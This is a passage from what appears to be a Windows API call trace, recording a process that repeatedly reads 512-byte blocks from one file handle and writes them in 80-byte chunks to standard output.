lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] GetFileType (hFile=0x50) returned 0x1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] GetFileType (hFile=0x50) returned 0x1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] GetFileType (hFile=0x50) returned 0x1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] GetFileType (hFile=0x50) returned 0x1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.355] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.355] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.355] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.355] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.355] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.355] GetFileType (hFile=0x50) returned 0x1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.355] GetFileType (hFile=0x50) returned 0x1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.355] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.355] GetFileType (hFile=0x50) returned 0x1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.355] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.355] GetFileType (hFile=0x50) returned 0x1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.355] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] GetFileType (hFile=0x50) returned 0x1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] GetFileType (hFile=0x50) returned 0x1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] GetFileType (hFile=0x50) returned 0x1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] GetFileType (hFile=0x50) returned 0x1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.356] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.356] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.356] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.356] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] GetFileType (hFile=0x50) returned 0x1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] GetFileType (hFile=0x50) returned 0x1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] GetFileType (hFile=0x50) returned 0x1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] GetFileType (hFile=0x50) returned 0x1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] GetFileType (hFile=0x50) returned 0x1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] GetFileType (hFile=0x50) returned 0x1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] GetFileType (hFile=0x50) returned 0x1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] GetFileType (hFile=0x50) returned 0x1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.357] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.357] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.357] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.358] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] GetFileType (hFile=0x50) returned 0x1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] GetFileType (hFile=0x50) returned 0x1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] GetFileType (hFile=0x50) returned 0x1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] GetFileType (hFile=0x50) returned 0x1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] GetFileType (hFile=0x50) returned 0x1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] GetFileType (hFile=0x50) returned 0x1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] GetFileType (hFile=0x50) returned 0x1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] GetFileType (hFile=0x50) returned 0x1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.359] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.359] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.359] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.359] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] GetFileType (hFile=0x50) returned 0x1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] GetFileType (hFile=0x50) returned 0x1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] GetFileType (hFile=0x50) returned 0x1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] GetFileType (hFile=0x50) returned 0x1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] GetFileType (hFile=0x50) returned 0x1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] GetFileType (hFile=0x50) returned 0x1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] GetFileType (hFile=0x50) returned 0x1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] GetFileType (hFile=0x50) returned 0x1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.360] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.360] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.360] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.360] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] GetFileType (hFile=0x50) returned 0x1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] GetFileType (hFile=0x50) returned 0x1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] GetFileType (hFile=0x50) returned 0x1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] GetFileType (hFile=0x50) returned 0x1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] GetFileType (hFile=0x50) returned 0x1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] GetFileType (hFile=0x50) returned 0x1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] GetFileType (hFile=0x50) returned 0x1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] GetFileType (hFile=0x50) returned 0x1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.361] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.361] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.361] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.361] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.361] GetFileType (hFile=0x50) returned 0x1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] GetFileType (hFile=0x50) returned 0x1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] GetFileType (hFile=0x50) returned 0x1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] GetFileType (hFile=0x50) returned 0x1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] GetFileType (hFile=0x50) returned 0x1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] GetFileType (hFile=0x50) returned 0x1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] GetFileType (hFile=0x50) returned 0x1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.362] GetFileType (hFile=0x50) returned 0x1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.363] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.363] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.363] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.363] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] GetFileType (hFile=0x50) returned 0x1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] GetFileType (hFile=0x50) returned 0x1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] GetFileType (hFile=0x50) returned 0x1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] GetFileType (hFile=0x50) returned 0x1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] GetFileType (hFile=0x50) returned 0x1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.363] GetFileType (hFile=0x50) returned 0x1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] GetFileType (hFile=0x50) returned 0x1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] 